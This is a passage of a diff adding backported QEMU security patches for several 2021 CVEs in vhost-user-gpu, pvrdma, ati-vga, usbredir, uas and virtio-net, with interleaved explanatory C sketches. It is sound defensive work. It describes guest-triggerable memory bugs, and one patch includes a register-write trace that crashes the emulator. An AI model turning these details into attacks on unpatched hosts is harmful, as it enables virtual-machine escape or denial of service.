+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-6-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
+ struct virtio_gpu_ctrl_command *cmd)
+ {
+ struct virtio_gpu_resource_unref unref;
++ struct iovec *res_iovs = NULL;
++ int num_iovs = 0;
+
+ VUGPU_FILL_CMD(unref);
+
++ virgl_renderer_resource_detach_iov(unref.resource_id,
++ &res_iovs,
++ &num_iovs);
++ g_free(res_iovs);
++
+ virgl_renderer_resource_unref(unref.resource_id);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
new file mode 100644
index 0000000000..e592ce50e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' fails, 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
+- virgl_renderer_resource_attach_iov(att_rb.resource_id,
++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+ res_iovs, att_rb.nr_entries);
++ if (ret != 0) {
++ g_free(res_iovs);
++ }
+ }
+
+ static void
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
+From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:56 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
+ virgl_cmd_get_capset_info (CVE-2021-3545)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Otherwise part of 'resp' will be leaked to the guest.
+
+Fixes: CVE-2021-3545
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
+in getting capset info dispatch")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-2-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3545
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
+
+ VUGPU_FILL_CMD(info);
+
++ memset(&resp, 0, sizeof(resp));
+ if (info.capset_index == 0) {
+ resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
+ virgl_renderer_get_cap_set(resp.capset_id,
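Editor's note: the single added memset() above zero-fills the response before only some of its fields are set, so padding and untouched members cannot leak host memory to the guest. A small self-contained sketch of the idea, with an invented struct standing in for the virtio-gpu response:

    #include <stdint.h>
    #include <string.h>
    #include <stdio.h>

    struct capset_info_resp {
        uint32_t capset_id;
        uint32_t capset_max_version;
        uint32_t capset_max_size;
        uint32_t padding;          /* never written explicitly */
    };

    static void fill_resp(struct capset_info_resp *resp, uint32_t index)
    {
        /* Without this memset, 'padding' (and any field left unset below)
         * would contain stale stack bytes that get copied to the guest. */
        memset(resp, 0, sizeof(*resp));

        if (index == 0) {
            resp->capset_id = 1;
            resp->capset_max_version = 2;
            resp->capset_max_size = 4096;
        }
        /* For any other index the response is now all zeroes, not garbage. */
    }

    int main(void)
    {
        struct capset_info_resp resp;

        fill_resp(&resp, 5);
        printf("id=%u size=%u\n", (unsigned)resp.capset_id,
               (unsigned)resp.capset_max_size);
        return 0;
    }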
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
+From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:02 -0700
+Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
+ (CVE-2021-3546)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_cmd_get_capset' sets 'max_size' to 0,
+'virgl_renderer_fill_caps' will write data past the end of 'resp'.
+This patch avoids this by checking the returned 'max_size'.
+
+virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
+virgl capabilities max_size")
+
+Fixes: CVE-2021-3546
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-8-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3546
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
+
+ virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
+ &max_size);
++ if (!max_size) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
++ return;
++ }
+ resp = g_malloc0(sizeof(*resp) + max_size);
+
+ resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
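Editor's note: the added check refuses to continue when the renderer reports a zero capset size, because the allocation above is sized from that value and a later fill could overrun it. A rough standalone sketch of that guard; the query function, sizes, and names are made up for illustration:

    #include <stdint.h>
    #include <stdlib.h>
    #include <stdio.h>

    /* Stand-in for a library call that reports how many bytes it will write. */
    static void query_blob_size(uint32_t *max_size)
    {
        *max_size = 0;   /* a hostile or buggy backend could report 0 */
    }

    static void *get_blob(size_t header_size)
    {
        uint32_t max_size = 0;

        query_blob_size(&max_size);
        /* Reject implausible sizes before sizing the allocation from them;
         * otherwise the producer may still write a fixed minimum amount and
         * overrun the (too small) buffer allocated below. */
        if (max_size == 0) {
            return NULL;
        }
        return calloc(1, header_size + max_size);
    }

    int main(void)
    {
        void *p = get_blob(16);

        printf("allocation %s\n", p ? "succeeded" : "rejected");
        free(p);
        return 0;
    }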
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 0000000000..7a88e29384
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure the mremap boundaries are valid rather than trusting the guest
+kernel to pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+ return NULL;
+ }
+
++ length = ROUND_UP(length, TARGET_PAGE_SIZE);
++ if (nchunks * TARGET_PAGE_SIZE != length) {
++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++ (unsigned long)length);
++ return NULL;
++ }
++
+ dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory");
+--
+2.25.1
+
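Editor's note: the fix rounds the guest-supplied length up to a page and then insists that nchunks times the page size equals it, so the host-side remap cannot be driven past the mapped page directory. A minimal sketch of that consistency check; PAGE_SIZE and the rounding macro here are stand-ins for QEMU's TARGET_PAGE_SIZE and ROUND_UP:

    #include <stdint.h>
    #include <stdbool.h>
    #include <stdio.h>

    #define PAGE_SIZE 4096u

    /* Round x up to the next multiple of the page size. */
    #define ROUND_UP_PAGE(x) (((x) + PAGE_SIZE - 1) / PAGE_SIZE * PAGE_SIZE)

    /* Validate that a guest-supplied (nchunks, length) pair is self-consistent
     * before 'length' is used to size any host-side remapping. */
    static bool pdir_params_valid(uint32_t nchunks, uint64_t length)
    {
        length = ROUND_UP_PAGE(length);
        return (uint64_t)nchunks * PAGE_SIZE == length;
    }

    int main(void)
    {
        printf("%d\n", pdir_params_valid(2, 8000));   /* 1: rounds to 2 pages */
        printf("%d\n", pdir_params_valid(2, 100000)); /* 0: length too large  */
        return 0;
    }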
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
+From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:46:34 +0300
+Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
+
+Check that the guest passed a non-zero page count
+for pvrdma device ring buffers.
+
+Fixes: CVE-2021-3607
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3607
+Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_main.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
+index 84ae8024fc..7c0c3551a8 100644
+--- a/hw/rdma/vmw/pvrdma_main.c
++++ b/hw/rdma/vmw/pvrdma_main.c
+@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
+ uint64_t *dir, *tbl;
+ int rc = 0;
+
++ if (!num_pages) {
++ rdma_error_report("Ring pages count must be strictly positive");
++ return -EINVAL;
++ }
++
+ dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory (ring %s)", name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 0000000000..7055ec3d23
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+===================================================================
+--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
+ atomic_set(&ring->ring_state->cons_head, 0);
+ */
+ ring->npages = npages;
+- ring->pages = g_malloc(npages * sizeof(void *));
++ ring->pages = g_malloc0(npages * sizeof(void *));
+
+ for (i = 0; i < npages; i++) {
+ if (!tbl[i]) {
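Editor's note: switching to g_malloc0 matters because the error path frees every table slot, including slots that were never filled; zero-initialising makes those slots NULL, which is safe to free. A plain-C sketch of the same pattern using calloc()/free() in place of the GLib and DMA helpers:

    #include <stdlib.h>
    #include <stdio.h>

    /* Build a table of 'n' buffers. If one allocation fails halfway through,
     * the cleanup loop frees every slot; because the table was zero-initialised
     * with calloc(), the not-yet-filled slots are NULL and free(NULL) is a
     * no-op. With plain malloc() those slots would hold garbage pointers. */
    static void **alloc_table(size_t n)
    {
        void **pages = calloc(n, sizeof(*pages));   /* zeroed, like g_malloc0 */

        if (!pages) {
            return NULL;
        }
        for (size_t i = 0; i < n; i++) {
            pages[i] = malloc(64);
            if (!pages[i]) {
                for (size_t j = 0; j < n; j++) {
                    free(pages[j]);                 /* safe even for empty slots */
                }
                free(pages);
                return NULL;
            }
        }
        return pages;
    }

    int main(void)
    {
        void **t = alloc_table(8);

        printf("table %s\n", t ? "built" : "failed");
        if (t) {
            for (size_t i = 0; i < 8; i++) {
                free(t[i]);
            }
            free(t);
        }
        return 0;
    }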
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
+From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 12:43:26 +0530
+Subject: [PATCH] CVE-2021-3638
+
+Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
+CVE: CVE-2021-3638
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+When building QEMU with DEBUG_ATI defined then running with
+'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
+we get:
+
+ ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
+ ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
+ ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
+ ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
+ ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
+ ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
+ ati_mm_write 4 0x1420 DST_Y <- 0x3fff
+ ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
+ ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
+ ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
+rop:0xff
+ ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
+ ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
+y:16383, w:16383, h:16383, xor:0xff000000)
+ Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
+ (gdb) bt
+ #0 0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
+ #1 0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
+ #2 0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
+hw/display/ati_2d.c:196
+ #3 0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
+data=1073692671, size=4) at hw/display/ati.c:843
+ #4 0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
+addr=5512, ..., size=4, ...) at softmmu/memory.c:492
+
+Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
+the local dst_x and dst_y which adjust the (x, y) coordinates
+depending on the direction in the SRCCOPY ROP3 operation, but
+forgot to address the same issue for the PATCOPY, BLACKNESS and
+WHITENESS operations, which also call pixman_fill().
+
+Fix that now by using the adjusted coordinates in the pixman_fill
+call, and update the related debug printf().
+---
+ hw/display/ati_2d.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
+index 4dc10ea7..692bec91 100644
+--- a/hw/display/ati_2d.c
++++ b/hw/display/ati_2d.c
+@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
+ DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
+ s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
+ s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
+- s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
++ s->regs.src_x, s->regs.src_y, dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
+ (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
+@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
+ dst_stride /= sizeof(uint32_t);
+ DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
+ dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
+From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 22 Jul 2021 09:27:56 +0200
+Subject: [PATCH] usbredir: fix free call
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+data might point into the middle of a larger buffer; a separate
+free_on_destroy pointer is passed into bufp_alloc() to handle that. It is
+only used in the normal workflow though, not when dropping packets due
+to the queue being full. Fix that.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
+
+CVE: CVE-2021-3682
+Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/usb/redirect.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 4ec9326e05..1ec909a63a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
+ if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
+ if (dev->endpoint[EP2I(ep)].bufpq_size >
+ dev->endpoint[EP2I(ep)].bufpq_target_size) {
+- free(data);
++ free(free_on_destroy);
+ return -1;
+ }
+ dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
+--
+2.25.1
+
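Editor's note: the one-line change frees free_on_destroy, the pointer originally returned by the allocator, instead of data, which may point into the middle of that allocation; calling free() on an interior pointer is undefined behaviour. A small sketch of that convention (the names and the 2-byte header are illustrative, not QEMU code):

    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>

    /* 'data' may be an interior pointer (here: just past a 2-byte header), so
     * the caller also hands over 'free_on_destroy', the pointer that malloc()
     * actually returned. Only that pointer may ever be passed to free(). */
    static int enqueue(uint8_t *data, size_t len, void *free_on_destroy, int drop)
    {
        (void)data;
        (void)len;
        if (drop) {
            free(free_on_destroy);   /* NOT free(data): data is mid-buffer */
            return -1;
        }
        /* ... normally the packet would be queued and freed later ... */
        free(free_on_destroy);
        return 0;
    }

    int main(void)
    {
        uint8_t *raw = malloc(2 + 4);   /* 2-byte header + 4-byte payload */

        if (!raw) {
            return 1;
        }
        memset(raw, 0xab, 2 + 4);
        printf("%d\n", enqueue(raw + 2, 4, raw, 1));   /* drop path: -1 */
        return 0;
    }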
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
new file mode 100644
index 0000000000..cdd9c38db9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
+From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Wed, 18 Aug 2021 14:05:05 +0200
+Subject: [PATCH] uas: add stream number sanity checks.
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The device uses the guest-supplied stream number unchecked, which can
+lead to guest-triggered out-of-bounds access to the UASDevice->data3 and
+UASDevice->status3 fields. Add the missing checks.
+
+Fixes: CVE-2021-3713
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reported-by: Chen Zhe <chenzhe@huawei.com>
+Reported-by: Tan Jingguo <tanjingguo@huawei.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
+CVE: CVE-2021-3713
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/dev-uas.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
+index 6d6d1073..0b8cd4dd 100644
+--- a/hw/usb/dev-uas.c
++++ b/hw/usb/dev-uas.c
+@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ }
+ break;
+ case UAS_PIPE_ID_STATUS:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ QTAILQ_FOREACH(st, &uas->results, next) {
+ if (st->stream == p->stream) {
+@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ break;
+ case UAS_PIPE_ID_DATA_IN:
+ case UAS_PIPE_ID_DATA_OUT:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ req = usb_uas_find_request(uas, p->stream);
+ } else {
+@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ p->status = USB_RET_STALL;
+ break;
+ }
++
++err_stream:
++ error_report("%s: invalid stream %d", __func__, p->stream);
++ p->status = USB_RET_STALL;
++ return;
+ }
+
+ static void usb_uas_unrealize(USBDevice *dev, Error **errp)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
new file mode 100644
index 0000000000..b291ade4e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
+From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Thu, 2 Sep 2021 13:44:12 +0800
+Subject: [PATCH] virtio-net: fix use after unmap/free for sg
+
+When mergeable buffers are enabled, we try to set num_buffers after
+the virtqueue elem has been unmapped. This leads to several issues,
+e.g. a use-after-free when the descriptor has an address that belongs
+to a non-direct-access region. In that case we use a bounce buffer
+that is allocated during address_space_map() and freed during
+address_space_unmap().
+
+Fix this by storing the elems temporarily in an array and delaying the
+unmap until after we set num_buffers.
+
+This addresses CVE-2021-3748.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: fbe78f4f55c6 ("virtio-net support")
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
+CVE: CVE-2021-3748
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
+ 1 file changed, 32 insertions(+), 7 deletions(-)
+
+diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
+index 16d20cdee52a..f205331dcf8c 100644
